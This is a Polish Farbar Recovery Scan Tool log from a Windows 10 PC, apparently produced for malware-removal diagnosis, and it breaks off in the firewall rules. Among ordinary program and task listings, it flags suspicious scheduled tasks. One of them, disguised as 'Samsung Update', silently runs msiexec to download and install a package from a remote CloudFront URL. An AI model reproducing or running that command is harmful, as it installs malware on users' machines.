Rezultaty skanu uzupełniającego Farbar Recovery Scan Tool (x64) Wersja: 14-05-2017 Uruchomiony przez Ami777 (19-05-2017 10:23:07) Uruchomiony z K:\Downloads Windows 10 Pro Wersja 1703 (X64) (2017-04-13 20:58:44) Tryb startu: Normal ========================================================== ==================== Konta użytkowników: ============================= Administrator (S-1-5-21-2950136698-70054926-359602272-500 - Administrator - Disabled) Ami777 (S-1-5-21-2950136698-70054926-359602272-1001 - Administrator - Enabled) => C:\Users\Ami777 defaultuser0 (S-1-5-21-2950136698-70054926-359602272-1000 - Limited - Disabled) => C:\Users\defaultuser0 Gość (S-1-5-21-2950136698-70054926-359602272-501 - Limited - Disabled) Guest (S-1-5-21-2950136698-70054926-359602272-1002 - Limited - Enabled) Konto domyślne (S-1-5-21-2950136698-70054926-359602272-503 - Limited - Disabled) ==================== Centrum zabezpieczeń ======================== (Załączenie wejścia w fixlist spowoduje jego usunięcie.) AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} AV: ESET Smart Security Premium (Enabled - Up to date) {EC1D6F37-E411-475A-DF50-12FF7FE4AC70} AS: ESET Smart Security Premium (Enabled - Up to date) {577C8ED3-C22B-48D4-E5E0-298D0463E6CD} AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} FW: Zapora osobista ESET (Enabled) {D426EE12-AE7E-4602-F40F-BBCA8137EB0B} ==================== Zainstalowane programy ====================== (W fixlist dozwolone tylko załączanie programów adware z flagą "Hidden" w celu ich uwidocznienia. Programy adware powinny zostać w poprawny sposób odinstalowane.) 7-Zip 16.04 (x64) (HKLM\...\7-Zip) (Version: 16.04 - Igor Pavlov) Aktualizacje NVIDIA 24.0.0.0 (Version: 24.0.0.0 - NVIDIA Corporation) Hidden Ansel (Version: 381.89 - NVIDIA Corporation) Hidden ApoDispatchConfigurator (Version: 2.3.1201 - Nahimic) Hidden AudioLaunchpadConfigurator (Version: 2.3.1201 - Nahimic) Hidden BDE_ENT (x32 Version: 5.1.1 - Borland Software Corp.) Hidden CCleaner (HKLM\...\CCleaner) (Version: 5.29 - Piriform) CheckDevicesConfigurator (Version: 2.3.1201 - Nahimic) Hidden CodeGear Delphi and C++Builder 2009 Database Pack (HKLM-x32\...\CodeGear Delphi and C++Builder 2009 Database Pack) (Version: - CodeGear) CodeGear Delphi and C++Builder 2009 Database Pack (x32 Version: 6.0 - CodeGear) Hidden CodeGear RAD Studio 2009 (HKU\S-1-5-21-2950136698-70054926-359602272-1001\...\CodeGear RAD Studio 2009) (Version: - CodeGear) CodeGear RAD Studio 2009 (x32 Version: 6.0 - CodeGear) Hidden ConEmu 161206.x64 (HKLM\...\{7903B64C-30A1-4572-B8C5-8635D01B5E25}) (Version: 11.161.2060 - ConEmu-Maximus5) Deus Ex: Mankind Divided™ (HKLM\...\Steam App 337000) (Version: - Eidos Montreal) Dragon Gaming Center (HKLM-x32\...\InstallShield_{965B16C7-0778-4C45-B7D1-83A59E6FBBCB}) (Version: 1.0.1501.2801 - Micro-Star International Co., Ltd.) Dragon Gaming Center (x32 Version: 1.0.1501.2801 - Micro-Star International Co., Ltd.) Hidden ESET Smart Security Premium (HKLM\...\{6A05F459-0E1A-4A07-B4B5-C8AC7D10B02C}) (Version: 10.1.204.1 - ESET, spol. s r.o.) f.lux (HKU\S-1-5-21-2950136698-70054926-359602272-1001\...\Flux) (Version: - ) FileZilla Client 3.25.2 (HKU\S-1-5-21-2950136698-70054926-359602272-1001\...\FileZilla Client) (Version: 3.25.2 - Tim Kosse) Foxit Reader (HKLM-x32\...\Foxit Reader_is1) (Version: 8.2.1.6871 - Foxit Software Inc.) Git version 2.12.0 (HKLM\...\Git_is1) (Version: 2.12.0 - The Git Development Community) HeidiSQL (HKLM\...\HeidiSQL_is1) (Version: - Ansgar Becker) Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 20.19.15.4454 - Intel Corporation) Intel(R) Rapid Storage Technology (HKLM\...\{409CB30E-E457-4008-9B1A-ED1B9EA21140}) (Version: 14.7.0.1000 - Intel Corporation) Intel(R) Wireless Bluetooth(R) (HKLM-x32\...\{1DADF4B4-A166-403E-BAFD-DB721A578A71}) (Version: 18.1.1546.2762 - Intel Corporation) IrfanView 4.44 (32-bit) (HKLM-x32\...\IrfanView) (Version: 4.44 - Irfan Skiljan) JetBrains PhpStorm 7.1.5 (HKLM-x32\...\PhpStorm 7.1.5) (Version: 133.1886 - JetBrains s.r.o.) JetBrains WebStorm 2016.1.3 (HKLM-x32\...\WebStorm 2016.1.3) (Version: 145.1616.9 - JetBrains s.r.o.) LauncherSetup (Version: 2.3.1201 - Nahimic) Hidden Microsoft Office Professional 2016 - pl-pl (HKLM\...\ProfessionalRetail - pl-pl) (Version: 16.0.7967.2161 - Microsoft Corporation) Microsoft OneDrive (HKU\S-1-5-21-2950136698-70054926-359602272-1001\...\OneDriveSetup.exe) (Version: 17.3.6816.0313 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.21005 (HKLM-x32\...\{7f51bdb9-ee21-49ee-94d6-90afc321780e}) (Version: 12.0.21005.1 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.21005 (HKLM-x32\...\{ce085a78-074e-4823-8dc1-8a721b94b76d}) (Version: 12.0.21005.1 - Microsoft Corporation) Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.23026 (HKLM-x32\...\{e46eca4f-393b-40df-9f49-076faf788d83}) (Version: 14.0.23026.0 - Microsoft Corporation) Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24215 (HKLM-x32\...\{e2803110-78b3-4664-a479-3611a381656a}) (Version: 14.0.24215.1 - Microsoft Corporation) Mozilla Firefox 51.0.1 (x86 pl) (HKLM-x32\...\Mozilla Firefox 51.0.1 (x86 pl)) (Version: 51.0.1 - Mozilla) Mozilla Firefox 53.0.2 (x86 pl) (HKU\S-1-5-21-2950136698-70054926-359602272-1001\...\Mozilla Firefox 53.0.2 (x86 pl)) (Version: 53.0.2 - Mozilla) MSI Remind Manager (HKLM-x32\...\InstallShield_{3E23F267-3E35-40F9-B6BF-BC034D214717}) (Version: 1.0.1509.2501 - Micro-Star International Co., Ltd.) MSI Remind Manager (x32 Version: 1.0.1512.0701 - Micro-Star International Co., Ltd.) Hidden MSXML 4.0 SP3 Parser (HKLM-x32\...\{196467F1-C11F-4F76-858B-5812ADC83B94}) (Version: 4.30.2100.0 - Microsoft Corporation) MuseScore 2 (HKLM-x32\...\{4F0E15EA-F64C-11E5-9992-E717EA7DB0C8}) (Version: 2.0.3 - Werner Schweer and Others) MySQL Workbench 6.3 CE (HKLM\...\{CD8C5EC0-56A3-4F6E-BB22-E230059DF1F2}) (Version: 6.3.9 - Oracle Corporation) Nahimic 2 (HKLM-x32\...\{8bd1653f-b053-4a68-8753-dd096b92dd0d}) (Version: 2.3.12 - Nahimic) Nahimic2UISetup (Version: 2.3.1201 - Nahimic) Hidden Node.js (HKLM\...\{4F1DFC88-F671-4DD8-9DE1-36CDB5A4B9B8}) (Version: 6.9.5 - Node.js Foundation) Notepad++ (32-bit x86) (HKLM-x32\...\Notepad++) (Version: 7.3.3 - Notepad++ Team) NVIDIA GeForce Experience 3.5.0.70 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 3.5.0.70 - NVIDIA Corporation) NVIDIA Oprogramowanie systemu PhysX 9.17.0329 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.17.0329 - NVIDIA Corporation) NVIDIA Sterownik graficzny 381.89 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 381.89 - NVIDIA Corporation) NvNodejs (Version: 3.5.0.70 - NVIDIA Corporation) Hidden NvTelemetry (Version: 2.4.5.0 - NVIDIA Corporation) Hidden NvvHci (Version: 2.02.0.5 - NVIDIA Corporation) Hidden Office 16 Click-to-Run Extensibility Component (Version: 16.0.7967.2161 - Microsoft Corporation) Hidden Office 16 Click-to-Run Licensing Component (Version: 16.0.7967.2161 - Microsoft Corporation) Hidden Office 16 Click-to-Run Localization Component (Version: 16.0.7668.2066 - Microsoft Corporation) Hidden OpenOffice 4.1.3 (HKLM-x32\...\{4D71C348-C964-442D-B2DB-5160E46FB664}) (Version: 4.13.9783 - Apache Software Foundation) Oprogramowanie Intel® PROSet/Wireless (HKLM-x32\...\{a2733506-e526-4bae-bc12-b2d37e2016ec}) (Version: 18.30.0 - Intel Corporation) Oprogramowanie mikroukładu Intel® (x32 Version: 10.1.1.12 - Intel(R) Corporation) Hidden paint.net (HKLM\...\{1F895C18-6A2F-4A9E-BBE9-246783070F37}) (Version: 4.0.16 - dotPDN LLC) Panel sterowania NVIDIA 381.89 (Version: 381.89 - NVIDIA Corporation) Hidden Pinnacle Studio 12 (HKLM-x32\...\{D041EB9E-890A-4098-8F94-51DA194AC72A}) (Version: 12.0.0.6163 - Pinnacle Systems) Poedit (HKLM-x32\...\{68EB2C37-083A-4303-B5D8-41FA67E50B8F}_is1) (Version: 2.0.1 - Vaclav Slavik) PostgreSQL 9.6 (HKLM\...\PostgreSQL 9.6) (Version: 9.6 - PostgreSQL Global Development Group) Prey Anti-Theft (x32 Version: 1.6.5 - Prey, Inc.) Hidden ProductDaemonSetup (Version: 2.3.1201 - Nahimic) Hidden ProductNSConfigurator (Version: 2.3.1201 - Nahimic) Hidden Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.8029 - Realtek Semiconductor Corp.) SCM (HKLM\...\{E3CE9EC1-7244-4846-A383-6BF0B172917A}) (Version: 13.015.12097 - Application) SHIELD Streaming (Version: 7.1.0360 - NVIDIA Corporation) Hidden SHIELD Wireless Controller Driver (Version: 3.5.0.70 - NVIDIA Corporation) Hidden Sizing Options (HKLM-x32\...\InstallShield_{DFAB6DE8-E45F-4D5D-95C0-E54C58993F9F}) (Version: 3.0.1512.0101 - Application) Sizing Options (x32 Version: 3.0.1512.0101 - Application) Hidden Skype™ 7.33 (HKLM-x32\...\{3B7E914A-93D5-4A29-92BB-AF8C3F66C431}) (Version: 7.33.105 - Skype Technologies S.A.) SonicMapperConfigurator (Version: 2.3.1201 - Nahimic) Hidden SourceTree (HKU\S-1-5-21-2950136698-70054926-359602272-1001\...\SourceTree) (Version: 1.10.15.4 - Mike Minns, Mike Corsaro) Spotify (HKU\S-1-5-21-2950136698-70054926-359602272-1001\...\Spotify) (Version: 1.0.54.1079.g3809528e - Spotify AB) Star Wars - Episode 1 - Racer v1.1 - CD Setup (HKLM-x32\...\Star Wars - Episode 1 - Racer v1.1 - CD Setup_is1) (Version: - ) Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation) Sterownik wideo firmy Pinnacle (HKLM\...\{5EB90C06-964F-4195-B83E-BD7E55C88415}) (Version: 12.00.0017 - Pinnacle Systems) StrokeIt (HKU\S-1-5-21-2950136698-70054926-359602272-1001\...\StrokeIt) (Version: - ) StrokeIt (Polish) (HKU\S-1-5-21-2950136698-70054926-359602272-1001\...\StrokeIt (Polish)) (Version: - ) Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 19.3.4.57 - Synaptics Incorporated) SyncBackFree (HKLM-x32\...\SyncBackFree_is1) (Version: 7.6.64.0 - 2BrightSparks) UIInstallUpgrade (Version: 2.3.1201 - Nahimic) Hidden Urwigo (HKU\S-1-5-21-2950136698-70054926-359602272-1001\...\58f19a2872fb977e) (Version: 1.22.0.144 - Urwigo) VLC media player (HKLM-x32\...\VLC media player) (Version: 2.2.4 - VideoLAN) Vulkan Run Time Libraries 1.0.26.0 (HKLM\...\VulkanRT1.0.26.0) (Version: 1.0.26.0 - LunarG, Inc.) Vulkan Run Time Libraries 1.0.42.1 (HKLM\...\VulkanRT1.0.42.1) (Version: 1.0.42.1 - LunarG, Inc.) WD SmartWare (HKLM\...\{6FE8A1DA-8CA6-4801-BF0F-0F2FED143FF4}) (Version: 1.6.4.7 - Western Digital Technologies, Inc.) Windows 10 Update and Privacy Settings (HKLM\...\{293F2009-0145-450B-B4AA-063D43FB368C}) (Version: 1.0.13.0 - Microsoft Corporation) ==================== Niestandardowe rejestracje CLSID (filtrowane): ========================== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.) CustomCLSID: HKU\S-1-5-21-2950136698-70054926-359602272-1001_Classes\CLSID\{079fa300-6567-41d2-91a8-57e8d2769a19}\InprocServer32 -> C:\Windows\system32\dfshim.dll (Microsoft Corporation) ==================== Zaplanowane zadania (filtrowane) ============= (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.) Task: {047A5F5C-E9C5-40CB-98A4-8ADC8064DC36} - System32\Tasks\2BrightSparks\SyncBackFree\AMI777-MSI-Ami777\SyncBackFree Pulpit => C:\Apps\2BrightSparks\SyncBackFree\SyncBackFree.exe [2017-03-22] (2BrightSparks Pte. Ltd.) Task: {0628671D-47EB-479C-AB43-0DA02F7B7F0F} - System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\NvNode\nvnodejslauncher.exe [2017-03-28] (NVIDIA Corporation) Task: {06C778CE-7593-40DC-BDB1-772C62CA19A6} - System32\Tasks\Nahimic2UILauncherRun => C:\Program Files\Nahimic\Nahimic2\UserInterface\Nahimic2UILauncher.exe [2016-12-07] () Task: {0B863105-9B37-49F4-93F4-C096D413B811} - System32\Tasks\Driver Booster SkipUAC (Ami777) => C:\Program Files (x86)\IObit\Driver Booster\4.3.0\DriverBooster.exe Task: {11C2B29E-F789-4D07-BDB0-5077E854E7C7} - System32\Tasks\2BrightSparks\SyncBackFree\AMI777-MSI-Ami777\SyncBackFree Documents => C:\Apps\2BrightSparks\SyncBackFree\SyncBackFree.exe [2017-03-22] (2BrightSparks Pte. Ltd.) Task: {18B15748-FDD6-4E43-992A-5501F829E4CB} - \Pherluseghefly -> Brak pliku <==== UWAGA Task: {1C1D108E-4C11-43B4-8528-DF7FA3CCAEB5} - System32\Tasks\Microsoft\Windows\Windows Subsystem for Linux\AptPackageIndexUpdate => C:\WINDOWS\System32\LxRun.exe [2017-04-13] (Microsoft Corporation) Task: {1D0D2656-FB66-4BB8-A5DC-4671F1A1FD59} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [2017-05-04] (Microsoft Corporation) Task: {1E9D682B-0D23-4F55-9011-4175EEC3C65F} - System32\Tasks\2BrightSparks\SyncBackFree\AMI777-MSI-Ami777\SyncBackFree KProjekty => C:\Apps\2BrightSparks\SyncBackFree\SyncBackFree.exe [2017-03-22] (2BrightSparks Pte. Ltd.) Task: {370D6188-55E8-4C96-93C8-D63E80C37E2B} - System32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [2017-03-28] (NVIDIA Corporation) Task: {69F805CF-FFC5-4EF4-B0DC-29E13A84AE13} - System32\Tasks\CCleanerSkipUAC => C:\Apps\CCleaner\CCleaner.exe [2017-04-11] (Piriform Ltd) Task: {6E4FDA6A-525B-46A6-ACF2-570CB7889EF1} - System32\Tasks\2BrightSparks\SyncBackFree\AMI777-MSI-Ami777\SyncBackFree Full K BACKUP to external => C:\Apps\2BrightSparks\SyncBackFree\SyncBackFree.exe [2017-03-22] (2BrightSparks Pte. Ltd.) Task: {78247855-F9EA-4938-B6FB-7FB3AAED9071} - \{E1751303-56DE-A4A8-AD34-2CB4B211F577} -> Brak pliku <==== UWAGA Task: {7F669DB4-BE85-4804-AEF5-0679A03C0B15} - System32\Tasks\Microsoft\Windows\Multimedia\Manager => C:\Windows\Manager.exe Task: {891C9E22-25F7-47EA-B11F-6FFAECFB9AE9} - \{080E7E47-7A09-7D0B-0411-7F097F0D110F} -> Brak pliku <==== UWAGA Task: {8979C7DC-BF06-429D-80B5-AD8450E62168} - System32\Tasks\NvTmRep_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [2017-03-28] (NVIDIA Corporation) Task: {8A411FA0-254F-414A-9942-F84EA0634B2B} - \{B245F7A8-C5C1-3B83-DD83-C0BE323F7E4D} -> Brak pliku <==== UWAGA Task: {A436E808-EB49-408C-A17A-465A8958536F} - System32\Tasks\Microsoft\Office\Office Automatic Updates => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [2017-05-04] (Microsoft Corporation) Task: {A5AA80B7-B1C1-4C97-B3E0-F99EDCBF2128} - System32\Tasks\NvTmMon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmMon.exe [2017-03-28] (NVIDIA Corporation) Task: {C3E25D83-AA92-4D39-B534-A85704660DD8} - System32\Tasks\2BrightSparks\SyncBackFree\AMI777-MSI-Ami777\SyncBackFree Kxampphtpdocs => C:\Apps\2BrightSparks\SyncBackFree\SyncBackFree.exe [2017-03-22] (2BrightSparks Pte. Ltd.) Task: {C48AEC6A-2FC5-49D7-BD1B-949FDBEF8AD2} - System32\Tasks\MSI_Dragon Gaming Center => C:\Program Files (x86)\MSI\Dragon Gaming Center\mDispatch.exe [2014-01-23] (TODO: <公司名稱>) Task: {CC82C1D7-9FA3-4B9E-A21C-8260B3A008D9} - System32\Tasks\NvTmRepOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [2017-03-28] (NVIDIA Corporation) Task: {CED06A8D-1D1E-4AAF-8014-3A0E8BA193C3} - System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [2017-03-28] (NVIDIA Corporation) Task: {DD82C199-C378-4BD5-9C95-C177EE560942} - System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [2017-03-28] (NVIDIA Corporation) Task: {E4B4A115-9211-43AB-BD8B-8A22FC577E9B} - \{0FFB74BD-B850-C316-9B7F-EAC319D81865} -> Brak pliku <==== UWAGA Task: {E5815807-483D-4738-9916-5EB925B8C799} - System32\Tasks\Nahimic2Svc64Run => C:\Program Files\Nahimic\Nahimic2\UserInterface\x64\Nahimic2Svc64.exe [2016-12-07] () Task: {E8D155CE-85FD-4A09-93EC-007E7C771293} - System32\Tasks\Nahimic2Svc32Run => C:\Program Files\Nahimic\Nahimic2\UserInterface\Nahimic2Svc32.exe [2016-12-07] () Task: {F8E5756F-CECD-490B-84C2-3056CC37C298} - System32\Tasks\Prersogh Agent => C:\Program Files (x86)\Nleshcicse\vupesh.exe Task: {FBE7F04D-FD3C-453F-883C-F4086C6D1603} - System32\Tasks\Samsung Update => msiexec.exe /i hxxp://D2Buh1bF1G584W.CLouDfRoNT.net/mmtsk/occup.php?p=WDCXWD10JPVX-22JC3T0_WD-WXE1A9654JP954JP9&d=20170428 /q <==== UWAGA (Załączenie wejścia w fixlist spowoduje przesunięcie pliku zadania (.job). Plik uruchamiany docelowo przez zadanie nie zostanie przeniesiony.) Task: C:\WINDOWS\Tasks\CreateExplorerShellUnelevatedTask.job => C:\WINDOWS\explorer.exe ==================== Skróty ============================= (Wybrane wejścia mogą zostać załączone w celu ich zresetowania lub usunięcia.) Shortcut: C:\Users\Ami777\Desktop\DevTools\Delphi 2009.lnk -> K:\Apps\CodeGear\RAD Studio\6.0\bin\Delphi 2009 EditorLines fix.bat () ShortcutWithArgument: C:\Users\Ami777\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\CodeGear RAD Studio 2009\RAD Studio Command Prompt.lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation) -> /K "K:\Apps\CodeGear\RAD Studio\6.0\bin\rsvars.bat" ==================== Załadowane moduły (filtrowane) ============== 2017-02-10 23:13 - 2017-03-28 05:32 - 01147328 _____ () C:\Program Files\NVIDIA Corporation\NvContainer\libprotobuf.dll 2017-04-12 22:33 - 2017-03-13 12:46 - 00182784 _____ () K:\Apps\PostgreSQL\9.6\bin\LIBPQ.dll 2017-04-12 22:35 - 2016-08-01 12:29 - 02264576 _____ () K:\Apps\PostgreSQL\9.6\bin\libxml2.dll 2016-12-07 11:27 - 2016-12-07 11:27 - 00201400 _____ () C:\Program Files\Nahimic\Nahimic2\UserInterface\x64\Nahimic2DevProps.dll 2016-12-07 11:27 - 2016-12-07 11:27 - 00273592 _____ () C:\Program Files\Nahimic\Nahimic2\UserInterface\x64\Nahimic2OSD.dll 2017-03-18 22:58 - 2017-03-18 22:58 - 00138000 _____ () C:\WINDOWS\SYSTEM32\inputhost.dll 2017-04-30 13:19 - 2017-04-30 13:19 - 00052392 _____ () K:\Apps\FileZilla FTP Client\fzshellext_64.dll 2017-03-08 04:42 - 2017-03-08 04:42 - 00230064 _____ () C:\Apps\Notepad++\NppShell_06.dll 2017-03-18 22:59 - 2017-03-20 05:59 - 01731072 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll 2017-05-09 09:17 - 2017-05-09 09:18 - 00074752 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.15.597.0_x64__kzf8qxf38zg5c\SkypeHost.exe 2017-05-09 09:17 - 2017-05-09 09:18 - 00201728 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.15.597.0_x64__kzf8qxf38zg5c\SkypeBackgroundTasks.dll 2017-05-09 09:17 - 2017-05-09 09:18 - 43195904 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.15.597.0_x64__kzf8qxf38zg5c\SkyWrap.dll 2017-05-09 09:17 - 2017-05-09 09:18 - 02457088 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.15.597.0_x64__kzf8qxf38zg5c\skypert.dll 2016-12-07 11:24 - 2016-12-07 11:24 - 00693432 _____ () C:\Program Files\Nahimic\Nahimic2\UserInterface\Nahimic2UILauncher.exe 2010-01-03 19:27 - 2010-01-03 19:27 - 00026248 _____ () C:\Apps\StrokeIt\Bin\strokeit.exe 2016-12-07 11:25 - 2016-12-07 11:25 - 02036920 _____ () C:\Program Files\Nahimic\Nahimic2\UserInterface\Nahimic2svc32.exe 2016-12-07 11:28 - 2016-12-07 11:28 - 00495800 _____ () C:\Program Files\Nahimic\Nahimic2\UserInterface\x64\Nahimic2svc64.exe 2014-01-22 11:44 - 2014-01-22 11:44 - 00075912 _____ () C:\Program Files (x86)\MSI\Dragon Gaming Center\WinIo64.dll 2017-04-11 00:57 - 2017-04-11 00:57 - 00069632 _____ () C:\Apps\CCleaner\lang\lang-1045.dll 2017-05-11 10:20 - 2017-05-11 10:20 - 00899584 _____ () \\?\C:\Windows\Prey\versions\1.6.8\node_modules\sqlite3\lib\binding\node-v46-win32-ia32\node_sqlite3.node 2017-02-10 23:13 - 2017-03-28 05:32 - 00900032 _____ () C:\Program Files (x86)\NVIDIA Corporation\NvContainer\libprotobuf.dll 2016-12-07 11:23 - 2016-12-07 11:23 - 00176312 _____ () C:\Program Files\Nahimic\Nahimic2\UserInterface\Nahimic2DevProps.dll 2016-12-07 11:21 - 2016-12-07 11:21 - 00250552 _____ () C:\Program Files\Nahimic\Nahimic2\UserInterface\Nahimic2OSD.dll 2010-01-03 19:28 - 2010-01-03 19:28 - 00016520 _____ () C:\Apps\StrokeIt\Bin\Plugins\exec.dll 2010-01-03 19:28 - 2010-01-03 19:28 - 00018056 _____ () C:\Apps\StrokeIt\Bin\Plugins\keys.dll 2010-01-03 19:28 - 2010-01-03 19:28 - 00013448 _____ () C:\Apps\StrokeIt\Bin\Plugins\msg.dll 2010-01-03 19:28 - 2010-01-03 19:28 - 00013448 _____ () C:\Apps\StrokeIt\Bin\Plugins\multimon.dll 2010-01-03 19:28 - 2010-01-03 19:28 - 00012936 _____ () C:\Apps\StrokeIt\Bin\Plugins\OSD.dll 2010-01-03 19:28 - 2010-01-03 19:28 - 00010376 _____ () C:\Apps\StrokeIt\Bin\Plugins\siControl.dll 2010-01-03 19:28 - 2010-01-03 19:28 - 00013960 _____ () C:\Apps\StrokeIt\Bin\Plugins\utilities.dll 2010-01-03 19:28 - 2010-01-03 19:28 - 00016520 _____ () C:\Apps\StrokeIt\Bin\Plugins\win.dll 2010-01-03 19:27 - 2010-01-03 19:27 - 00011912 _____ () C:\Apps\StrokeIt\Bin\mhook.dll 2017-02-10 23:13 - 2017-03-21 06:27 - 02442176 _____ () \\?\C:\Program Files (x86)\NVIDIA Corporation\NvNode\Downloader.node 2017-02-10 23:13 - 2017-03-21 06:27 - 00363576 _____ () \\?\C:\Program Files (x86)\NVIDIA Corporation\NvNode\NVAccountAPINode.node 2017-02-10 23:13 - 2017-03-21 06:27 - 00254008 _____ () \\?\C:\Program Files (x86)\NVIDIA Corporation\NvNode\DriverInstall.node 2017-02-10 23:13 - 2017-03-21 06:27 - 00385592 _____ () \\?\C:\Program Files (x86)\NVIDIA Corporation\NvNode\NvGameShareAPINode.node 2017-02-10 23:13 - 2017-03-21 06:27 - 00469048 _____ () \\?\C:\Program Files (x86)\NVIDIA Corporation\NvNode\NvGalleryAPINode.node 2017-02-10 23:13 - 2017-03-21 06:27 - 00571840 _____ () \\?\C:\Program Files (x86)\NVIDIA Corporation\NvNode\NvSpCapsAPINode.node ==================== Alternate Data Streams (filtrowane) ========= (Załączenie wejścia w fixlist spowoduje usunięcie strumienia ADS.) ==================== Tryb awaryjny (filtrowane) =================== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Wartość "AlternateShell" zostanie przywrócona.) HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service" ==================== Powiązania plików (filtrowane) =============== (Załączenie wejścia w fixlist spowoduje usunięcie obiektu z rejestru lub przywrócenie jego domyślnej postaci.) ==================== Internet Explorer - Witryny zaufane i z ograniczeniami =============== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru.) ==================== Hosts - zawartość: ========================== (Użycie dyrektywy Hosts: w fixlist spowoduje reset pliku Hosts.) 2016-07-16 13:47 - 2017-04-18 17:32 - 00000888 ____N C:\WINDOWS\system32\Drivers\etc\hosts 127.0.0.1 v1.ff.avast.com 127.0.0.1 vlcproxy.ff.avast.com ==================== Inne obszary ============================ (Obecnie brak automatycznej naprawy dla tej sekcji.) HKU\S-1-5-21-2950136698-70054926-359602272-1001\Control Panel\Desktop\\Wallpaper -> C:\Windows\web\wallpaper\Windows\img0.jpg DNS Servers: 8.8.8.8 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1) Zapora systemu Windows [funkcja włączona] ==================== MSCONFIG/TASK MANAGER - Wyłączone elementy == HKLM\...\StartupApproved\Run: => "Logitech Download Assistant" HKLM\...\StartupApproved\Run: => "ShadowPlay" HKLM\...\StartupApproved\Run32: => "SecurityHealth" HKLM\...\StartupApproved\Run32: => "WindowsDefender" HKU\S-1-5-21-2950136698-70054926-359602272-1001\...\StartupApproved\Run: => "Spotify Web Helper" HKU\S-1-5-21-2950136698-70054926-359602272-1001\...\StartupApproved\Run: => "8JRMQQOHOZXMEUD" HKU\S-1-5-21-2950136698-70054926-359602272-1001\...\StartupApproved\Run: => "background_fault" ==================== Reguły Zapory systemu Windows (filtrowane) =============== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.) FirewallRules: [VIRT-MIGL-In-TCP-NoScope] => (Allow) %systemroot%\system32\vmms.exe FirewallRules: [VIRT-REMOTEDESKTOP-In-TCP-NoScope] => (Allow) %systemroot%\system32\vmms.exe FirewallRules: [UDP Query User{1568D3F2-79B0-4804-9EDC-7C611ACAB740}C:\apps\jetbrains\webstorm 2016.1.3\bin\webstorm.exe] => (Allow) 